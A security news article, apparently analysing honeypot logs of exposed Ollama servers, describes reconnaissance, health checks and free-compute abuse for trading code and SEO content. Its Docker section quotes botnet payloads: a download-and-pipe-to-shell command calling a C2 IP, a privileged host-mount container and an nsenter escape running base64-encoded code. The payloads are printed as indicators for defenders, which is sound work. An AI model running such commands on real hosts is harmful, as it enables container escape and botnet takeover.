Back to Home

Ollama Abuses: Trading and Content Farms

The Article Analyzes Logs of Honeypots of Open Ollama Instances: Reconnaissance, health-check, Exploitation for Trading, Education and SEO Content. Parallel Attacks on Docker and Kubelet with Escape Techniques Described. IOC, MITRE ATT&CK and Protection Measures Provided.

Ollama Under Attack: Bots Steal GPU for Trading
Advertisement 728x90

Ollama Abuse: From Trading Bots to Content Farms

Open Ollama instances are being abused for generating trading strategy code, creating educational materials, and mass-producing SEO content. Honeypots in Germany, the U.S., and Russia have recorded requests for popular models like llama3.1:8b and qwen2.5:7b. Attackers conduct reconnaissance, health checks, and parallel API endpoint testing before leveraging someone else’s GPU.

Reconnaissance and Availability Checks

Scanners begin with basic queries to verify instance functionality. Common endpoints include:

  • GET /api/tags — lists available models in the Ollama API.
  • GET /v1/models — OpenAI-compatible model list.
  • GET /api/version — server version.

On a U.S.-based node, 244 /v1/models requests and 58 /api/tags were logged in one week. One IP performed a health check every 20 minutes using POST /v1/chat/completions with the payload {"messages": [{"role": "user", "content": "health-check"}]} — repeated 244 times.

Google AdInline article slot

Model enumeration follows a predictable pattern: sending a simple prompt like Hello or hi to models such as llama3.1:8b, qwen2.5:7b, codellama:13b, mistral:7b, deepseek:33b, and llama3.2. If a model responds, the instance is marked as usable.

Exploitation: Task Types

After reconnaissance, real-world tasks begin. Three categories have been observed.

Trading Bots

A pipeline on a U.S. node generates trading strategy code after a successful health check:

Google AdInline article slot
{
  "messages": [{
    "role": "user",
    "content": "Write Python 3 code for:\ndef backtest_strategy(prices: list[float]) -> float:\nUse a 10-period fast SMA and 50-period slow SMA crossover on prices, long when fast > slow, flat/short when fast < slow, and return total PnL as a float. Output only that function, no extra text."
  }]
}

The prompt was repeated 12 times across three models via /api/chat, /v1/chat/completions, and /v1/completions. This reflects a systematic effort to find free backend compute for algorithmic trading.

Proxy for LLM Clients

A session with a Chinese user involved a GLM client forwarding full conversation history, including system prompts and prior responses. A request for Anki flashcards on Mao’s Contradictions of Dialectics: 做一个学习毛泽东的矛盾论 有30张卡片的anki牌组. Final test: 你是什么模型 (What model are you?).

Content Farms

On a RU-based node, templated prompts for SEO content were used:

Google AdInline article slot
Answer the following question thoroughly and in detail.

Question: How have neural networks and deep learning transformed AI?

RULES:
- Write a complete, detailed answer.
- Do NOT repeat the question.
- Do NOT add a preamble.
- Your LAST line must be exactly: ##ANSWER_DONE##

Answer:

The stop word ##ANSWER_DONE## is used by parsers to detect completion. Topics include machine learning and AI evolution. Multiple models were queried in parallel with chain-of-thought reasoning applied to questions.

Parallel Infrastructure Attacks

Ollama scanners often combine with attacks on Docker (port 2375) and Kubelet (port 10250).

Docker Exploits

The botnet docker.selfrep (C2: 31.57.216.121) executes:

{
  "Cmd": ["sh", "-c",
    "(wget --no-check-certificate -qO- https://31.57.216.121/sh || curl -sk https://31.57.216.121/sh) | sh -s docker.selfrep"]
}

A more dangerous botnet (C2: 45.194.92.39) uses privileged containers:

{
  "Image": "alpine",
  "Cmd": ["sh", "-c", "echo d2dldCBodHRw...== | base64 -d | sh"],
  "HostConfig": {
    "Binds": ["/:/host"],
    "Privileged": true
  }
}

Alternative: nsenter escape:

{
  "Cmd": ["nsenter", "--target", "1",
    "--mount", "--uts", "--ipc", "--net", "--pid",
    "--", "bash", "-c", "echo d2dldCBodHRw...== | base64 -d | sh"]
}

Kubelet Reconnaissance

Requests to /api/v1/pods, /healthz, and ML-specific /update_weights_from_tensor indicate attempts to locate machine learning pipelines.

Key Takeaways

  • Open Ollama instances are integrated into pipelines for trading, education, and SEO without authentication.
  • Health checks and model enumeration (llama3.1, qwen2.5, etc.) are standard behaviors of automated scanners.
  • Docker attacks combine container escape via nsenter with privileged mounts and base64 obfuscation.
  • Markers like ##ANSWER_DONE## and health-check help detect bot farms.
  • Protection requires local binding, reverse proxying, and traffic monitoring.

— Editorial Team

Advertisement 728x90

Read Next